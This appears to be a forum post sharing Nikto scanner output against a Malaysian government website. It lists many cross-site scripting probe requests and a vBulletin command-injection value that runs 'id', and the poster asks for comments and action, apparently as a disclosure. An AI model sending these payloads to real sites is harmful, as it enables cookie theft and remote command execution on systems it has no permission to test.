\"><script>alert('Vulnerable')</script> : SPHERA HostingDirector and
Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site
Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2562: GET /SPHERA/login/sm_login_screen.php?uid=
\"><script>alert('Vulnerable')</script> : SPHERA HostingDirector and
Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site
Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2617: GET /acart2_0/signin.asp?msg=<script>alert(\"test\")</
script> : Alan Ward A-Cart 2.0 contains several XSS vulnerabilities
+ OSVDB-2695: GET /photo/ : My Photo Gallery pre 3.6 contains multiple
vulnerabilities including .. traversal, unspecified vulnerabilities,
and remote management interface access.
+ OSVDB-2790: GET /index.php?vo=\"><script>alert(document.cookie);</
script> : Ralusp Sympoll 1.5 is vulnerable to Cross Site Scripting
(XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2921: GET /shopping/shopdisplayproducts.asp?
id=1&cat=<script>alert('test')</script> : VP-ASP prior to 4.50 are
vulnerable to XSS attacks
+ OSVDB-3092: GET /archive/ : This might be interesting...
+ OSVDB-3092: GET /clients/ : This might be interesting...
+ OSVDB-3092: GET /directory/ : This might be interesting...
+ OSVDB-3092: GET /forum/ : This might be interesting...
+ OSVDB-3092: GET /home/ : This might be interesting...
+ OSVDB-3092: GET /mp3/ : This might be interesting...
+ OSVDB-3092: GET /new : This may be interesting...
+ OSVDB-3092: GET /new/ : This might be interesting...
+ OSVDB-3092: GET /news : This may be interesting...
+ OSVDB-17670: GET /vc30/ : Site Server sample files. This might be
interesting...
+ OSVDB-3093: GET /adv/gm001-mc/ : This might be interesting... has
been seen in web logs from an unknown scanner.
+ OSVDB-3233: GET /netbasic/websinfo.bas : Novell Netware 5.1 contains
Novonyx default files which reveal system information. All default
files should be removed.
+ OSVDB-3280: GET /forum/memberlist.php?
s=23c37cf1af5d2ad05f49361b0407ad9e&what=\">
\"<script>javascript:alert(document.cookie)</script> : Vbulletin 2.2.9
and below are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-3289: GET /firewall/policy/dlg?
q=-1&fzone=t<script>alert('Vulnerable')</script>>&tzone=dmz :
Fortigate firewall 2.50 and prior contains several CSS vulnerabilities
in various administrative pages.
+ OSVDB-3294: GET /firewall/policy/policy?
fzone=internal&tzone=dmz1<script>alert('Vulnerable')</script> :
Fortigate firewall 2.50 and prior contains several CSS vulnerabilities
in various administrative pages.
+ OSVDB-3295: GET /antispam/listdel?
file=blacklist&name=b<script>alert('Vulnerable')</
script>&startline=0 : Fortigate firewall 2.50 and prior contains
several CSS vulnerabilities in various administrative pages.
+ OSVDB-3295: GET /antispam/listdel?
file=whitelist&name=a<script>alert('Vulnerable')</
script>&startline=0(naturally) : Fortigate firewall 2.50 and prior
contains several CSS vulnerabilities in various administrative pages.
+ OSVDB-3296: GET /theme1/selector?
button=status,monitor,session&button_url=/system/status/status,/system/
status/moniter\"><script>alert('Vulnerable')</script>,/system/status/
session : Fortigate firewall 2.50 and prior contains several CSS
vulnerabilities in various administrative pages.
+ OSVDB-3296: GET /theme1/selector?
button=status,monitor,session&button_url=/system/status/status
\"><script>alert('Vulnerable')</script>,/system/status/moniter,/system/
status/session : Fortigate firewall 2.50 and prior contains several
CSS vulnerabilities in various administrative pages.
+ OSVDB-3296: GET /theme1/selector?button=status,monitor,session
\"><script>alert('Vulnerable')</script>&button_url=/system/status/
status,/system/status/moniter,/system/status/session : Fortigate
firewall 2.50 and prior contains several CSS vulnerabilities in
various administrative pages.
+ OSVDB-3299: GET /forumscalendar.php?
calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo
%20%60id%20%60;die();echo%22 : Vbulletin allows remote command
execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3299: GET /forumzcalendar.php?
calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo
%20%60id%20%60;die();echo%22 : Vbulletin allows remote command
execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3299: GET /htforumcalendar.php?
calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo
%20%60id%20%60;die();echo%22 : Vbulletin allows remote command
execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3299: GET /vbcalendar.php?
calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo
%20%60id%20%60;die();echo%22 : Vbulletin allows remote command
execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3299: GET /vbulletincalendar.php?
calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo
%20%60id%20%60;die();echo%22 : Vbulletin allows remote command
execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3417: GET /examplesWebApp/InteractiveQuery.jsp?
person=<script>alert('Vulnerable')</script> : BEA WebLogic 8.1 and
below are vulnerable to Cross Site Scripting (XSS) in example code. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0624
. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3458: GET /sgdynamo.exe?HTNAME=<script>alert('Vulnerable')</
script> : Ecometry's SGDynamo is vulnerable to Cross Site Scripting
(XSS). http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0375. http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-3486: GET /aktivate/cgi-bin/catgy.cgi?
key=0&cartname=axa200135022551089&desc=<script>alert('Vulnerable')</
script> : Aktivate Shopping Cart 1.03 and lower are vulnerable to
Cross Site Scripting (XSS). http://www.allen0keul.com/aktivate/ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-1212
, http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-4262: GET /addressbook.php?\"><script>alert(Vulnerable)</
script><!-- : Squirrel Mail 1.2.7 is vulnerable to Cross Site
Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-4265: GET /help.php?chapter=<script>alert('Vulnerable')</
script> : Squirrel Mail 1.2.7 is vulnerable to Cross Site Scripting
(XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-4356: GET /acart2_0/deliver.asp?msg=<script>alert(\"test\")</
script> : Alan Ward A-Cart 2.0 contains several XSS vulnerabilities
+ OSVDB-4357: GET /acart2_0/error.asp?msg=<script>alert(\"test\")</
script> : Alan Ward A-Cart 2.0 contains several XSS vulnerabilities
+ OSVDB-4358: GET /acart2_0/admin/error.asp?msg=<script>alert(\"test
\")</script> : Alan Ward A-Cart 2.0 contains several XSS vulnerabilities
+ OSVDB-4359: GET /acart2_0/admin/index.asp?msg=<script>alert(\"test
\")</script> : Alan Ward A-Cart 2.0 contains several XSS vulnerabilities
+ OSVDB-5097: GET /wwwping/index.stm?
wwwsite=<script>alert(document.cookie)</script> : Sambar Server
default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5098: GET /sysuser/docmgr/create.stm?
path=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5098: GET /sysuser/docmgr/edit.stm?
path=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5098: GET /sysuser/docmgr/ftp.stm?
path=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5098: GET /sysuser/docmgr/htaccess.stm?
path=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5098: GET /sysuser/docmgr/iecreate.stm?
path=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5098: GET /sysuser/docmgr/ieedit.stm?
path=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5098: GET /sysuser/docmgr/info.stm?
path=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5098: GET /sysuser/docmgr/mkdir.stm?
path=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5098: GET /sysuser/docmgr/rename.stm?
path=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5098: GET /sysuser/docmgr/search.stm?
path=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5098: GET /sysuser/docmgr/sendmail.stm?
path=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5098: GET /sysuser/docmgr/template.stm?
path=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5098: GET /sysuser/docmgr/update.stm?
path=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5098: GET /sysuser/docmgr/vccheckin.stm?
path=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5098: GET /sysuser/docmgr/vccreate.stm?
path=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5098: GET /sysuser/docmgr/vchist.stm?
path=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5099: GET /sysuser/docmgr/edit.stm?
name=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5099: GET /sysuser/docmgr/ieedit.stm?
name=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5099: GET /sysuser/docmgr/info.stm?
name=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5099: GET /sysuser/docmgr/rename.stm?
name=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5099: GET /sysuser/docmgr/sendmail.stm?
name=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5099: GET /sysuser/docmgr/update.stm?
name=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5099: GET /sysuser/docmgr/vccheckin.stm?
name=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5099: GET /sysuser/docmgr/vccreate.stm?
name=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5099: GET /sysuser/docmgr/vchist.stm?
name=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5102: GET /syshelp/stmex.stm?
foo=123&bar=<script>alert(document.cookie)</script> : Sambar Server
default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5103: GET /syshelp/cscript/showfunc.stm?
func=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5104: GET /syshelp/cscript/showfncs.stm?
pkg=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5105: GET /syshelp/cscript/showfnc.stm?
pkg=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5106: GET /netutils/ipdata.stm?
ipaddr=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5107: GET /netutils/findata.stm?
host=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5107: GET /netutils/findata.stm?
user=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-5108: GET /sysuser/docmgr/search.stm?
query=<script>alert(document.cookie)</script> : Sambar Server default
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-701: GET /pls/dadname/htp.print?
cbuf=<script>alert('Vulnerable')</script> : Oracle 9iAS is vulnerable
to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html
.
+ OSVDB-20954: GET /shopadmin.asp?Password=abc&UserName=
\"><script>alert(foo)</script> : VP-ASP Shopping Cart 5.50
shopadmin.asp UserName Variable XSS.
+ OSVDB-20406: GET /phpinfo.php?
GLOBALS[test]=<script>alert(document.cookie);</script> : PHP contains
a flaw that allows a remote cross site scripting attack.
+ OSVDB-24484: GET /phpinfo.php?
cx
[]=
<script>alert(foo)</script> : PHP 5.1.2 and 4.4.2 phpinfo() Function
Long Array XSS
+ OSVDB-35935: GET /rpc.php?q=\"><script>alert(document.cookie)</
script> : Unobtrusive Ajax Star Rating Bar is vulnerable to XSS in the
q variable.
+ 3577 items checked: 216 item(s) reported on remote host
+ End Time: 2009-09-05 1:09:01 (444 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Test Options: -h www.mardi.gov.my -output mardi.txt
---------------------------------------------------------------------------
Maybe someone might share this result and give your comments about
this. Your comments are needed, and I hope we can do something about it.
Thanks
Mohd Fazli Azran
PCBSD Malaysia